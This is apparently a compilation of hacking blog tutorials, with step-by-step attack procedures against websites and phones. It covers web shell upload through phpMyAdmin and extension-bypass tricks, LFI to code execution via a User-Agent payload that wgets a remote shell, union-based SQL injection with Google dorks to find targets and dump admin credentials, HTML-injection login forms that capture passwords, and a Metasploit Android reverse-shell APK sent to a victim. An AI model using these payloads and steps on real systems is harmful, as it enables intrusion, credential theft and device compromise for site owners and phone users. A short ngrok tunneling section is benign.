Shell Uploading Via Phpmyadmin

Shell Uploading Via Phpmyadmin

In this tutorial I will show you Shell Uploading Via Phpmyadmin step by step. For those who know this trick i am sorry for that but there are my many friends who don’t know this trick.

Phpmyadmin should be protected with passwords but still there are some website which doesn’t use password in phpmyadmin.

  • First we must know the path of document root like phpinfo.php .
  • Now we will go to phpmyadmin and will create a database.

I have created a database name shell. just create a database with your desired name.

  • After creating a database just click on database and then go to structure and and create a table with 1 column and after clicking on go enter name select type to text.

shell uploading via phpmyadmin

  • Then go to insert and paste your uploader code and click on go.

shell uploading via phpmyadmin

  • Now go to table in database and go to SQL tab and Insert this query.

 shell uploading via phpmyadmin

SELECT * FROM shell INTO OUTFILE 'C://wamp//www//shell//shell.php
  • Yeah we have uploaded our uploader from phpmyadmin now just go to the desired location and upload your shell. 😉

Shell Uploading Via Tamper Data

Shell Uploading Via Tamper Data

In this session we will discuss about shell uploading via tamper Data or shell uploading bypass method. During hacking you got successfully login to admin panel where they ask you for uploading image in .jpg and .png extension but you are not able to upload shell then read this tutorial carefully step by step.

In this tutorial we will bypass from unrestricted files upload using jpg extension so lets start our work.

  • Go to your desired location to upload files and rename your shell with .php.jpg extension like shell.php to shell.php.jpg as shown below.

Shell Uploading Via Tamper Data

  • Now just click on tools>Tamper Data>start tamper and click on upload.
  • Now tamper your page and in Post data find your file and rename shell.php.jpg to shell.php and then click ok.

Shell Uploading Via Tamper Data

  • Now your shell is successfully uploaded just access your shell.

Shell Uploading Via Tamper Data

Advance Shell uploading bypassing Extensions

1)shell.jpg.php (satisfies as check for jpg only)
2)shell.jpg.PhP (obfuscation)

3)shell.php;.jpg (sometimes can ignore whats after “;”)

4)shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)

5)shell.php.test (defaults to first recognised extension ignoring “test”)

6)shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)

7).phtml (a commonly used php parsed extension often forgotten about!)

8).php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)

Local File Inclusion (LFI) Vulnerability Attack

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss about the local file inclusion vulnerability and how it occurs and can be patched so first let me start with introduction about file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability.

What is Local File Inclusion (LFI) vulnerability ?

The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../|

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

so we go more directories up..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

yeah we successfully included a file and our next step is to include a proc/self/environ file. so now replace /etc/passwd with /proc/self/environ file as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this that means you have successfully included a proc/self/environ file.

 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/pass wd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.vulnerablewebsite.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

Injecting a Malicious code in Local File Inclusion vulnerable website

Now let’s inject our malicious code in proc/self/environ.How we can do that? We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. after submitting you will get an uploader or /proc/self/environ page just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.shell.com/shell.txt and save it as shell.php  in the website directory) through system(), and our shell will be created.If don’t
work,try exec() because system() can be disabled on the webserver from php.ini.

Accessing our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. Injection was succesfully.

So I think every body enjoyed this tutorial keep practising and learning. 🙂

SQL injection Union Based Manually Step by Step

SQL injection Union Based Manually Step by Step

Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.

What is SQL Injection ?

SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.

What an attacker can do ?

  • An attacker can Inject in website and can read and modify database.
  • An attacker can take the control of your admin panel if you have.
  • If the targeted website is E-commerce and website store the information then attacker can easily get.
  • An attacker can shell and deface the website.

So lets start our work….

Step 1:

Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here i got the error message in order by 5 that means the total number columns are 5.

Step:4

Now we will the vulnerable column using union command

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

SQL injection manually

As you can see in the above image vulnerable column is 2 following things we will use this commands.

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we will find the table name just paste this query in vulnerable column given below.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

SQL injection Union Based ManuallyStep 6:

we will find the column names of particular table just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.

keep practising but don’t harm any site…

 

How To Access Your LocalHost Any Where

How To Access Your LocalHost Any Where

You have spent a lots of hour on your system and setting up CMS. Your CMS is Perfectly setup with Nice look and sample post and you want to test on any other mobile device and tablets also your client wants to test it out but you don’t have time to migrate to public server then you can to give them a quick demo then you can show them on your localhost itself without using webhosting you can access your localhost any where.

How is it possible to access your localhost any where ?

It is possible through a secure tunneling services such as

  1. Ngrok
  2. PageKite
  3. Forward
  4. ProxyLocal
  5. Browser Stack

These are the sevices which provide a secure tunnel from the internet to your PC. They Provide a publically access url and forward it to your localhost system.

So lets start our main work.

Here i am using ngrok you can download ngrok from their official website.

  • First Extract ngrok on your desktop.
  • Type win+r and type cmd and hit enter.
  • go to desktop using cd command.

access localhost anywhere

  • Now we will Forward port 80. Use this command to forward ngrok http 80. when you enter this command it will show a new screen in you command prompt as shown in below image. But first start your Wamp/xamp.

Access Your LocalHost Any Where

Yeah now we got a secured tunnel just open your forwarding url and you can access your localhost any where.

HTML Injection Step by Step For Begineers

HTML Injection Step by Step For Begineers

Hello guys, hope you were doing good and practising so today in this post we will discuss about HTML injection and why HTML injection is risky.

What is HTML injection ?
HTML Injection, Hyper Text Markup Language Injection is a vulnerability which allows an attacker to inject a malicious script via specific parameter. Also HTML Injection is referred as a virtual defacement of web application.

The possible attveack scenario are demonstrated below

  1. An attacker can find a vulnerability and perform HTML injection vulnerability.
  2. An attacker can do phishing from the vulnerable website and send email to victim.
  3. The user visits the page due to the trust worthy domain and can Enter User Id and password which is sent to attacker server.

So lets start ..

  1. Firstly you need to find a website which is vulnerable to HTML Injection. Here I am using bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.

Html injection

3. As you can see I add my simple <h1> ahmed </h1> code and executed. this code is executed.

4. Now lets try with some html More html tag such as bold, colour, background e.t.c.

Html injection

See the above image i have modified its look using some basic tags. You can also perform XSS attack using HTML Injection as shown in below image.

Html injection

So let’s try to create a login form using this code.

<form action=”http://127.0.0.1/login.php” method=”POST”>
Username: <input type=”text” name=”username”><br>
Password: <input type=”password” name=”pass”><br>
<input type=”submit” value=”Login”></form>

Make your any page or you can add you deface page change this code and and change you location.

<form action=”http://127.0.0.1/login.php” method=”POST”>

 

Html injection

Just login with any username and password and see what happens.

Html injection

This page is shown after login of victim 🙁 and we got successfully ID and Password.

Keep Learning.. and Injecting but don’t harm an site.

Hack Android Mobile With Metasploit step by step

Hack Android Mobile With Metasploit step by step

Hello Guys, Today in this post we will discuss how to hack android mobile there are may ways of the android hacking but today I will show you how you can hack android mobile using Metasploit because metasploit is a free ware framework so we can hack mobile by this method. First let me start with introduction.

Android

Android is a mobile operating system based on the linux kernel developed by google. primarily android is designed for touch screen mobiles such as smartphone, tablet e.t.c with user interface based on the direct mainupulation.

So let’s come to point.

Pre requisite:

  1. Android Phone
  2. Attacker system Kali linux
  3. Metasploit
  4. Brain 🙂

so this are the requirements to perform this practical in this post In metasploit series i am covering from basics and will cover up to post exploitation.

  • As an attacker we need to check our ip address using “ifconfig” command to set LHOST & LPORT.
  • Now you Need to create a msfpayload use the following command.

msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT [Port which you want to forward] R > /var/www/anyname.apk

hack android mobile using metasploit

Here as  I setted an LPORT is 443 because there is a one good reason behind this the reason is that almost every mobile has 443 open.

by using above command the apk will created..

  • Now launch msfconsole
  • here we use exploit multihandler to start our attack as well as payload.
  • use the following commands given below.

use exploit/multi/handler [Enter]
set payload/android/meterpreter/reverse_tcp [Enter]
Set LHOST= attacker Ip
set LPORT=443

Now we need to give permission to our apk that we created attack.apk  for giving permission use this command

chmod 777 /var/www/attack.apk

Yeah, we gave permission to our apk Now, I will send file to victim. Before installing this file to victim just start your metasploit listener using exploit command. when victim installed your apk then metaploit behaviour changes like this and shows you session opened..

hack android mobile using metasploit

Now our listner is listening traffic and giving information.

In previous tutorial we discussed post exploitation with meterpreter in netapi windows xp vulnerability read carefully steps are same.

Keep learning and practising…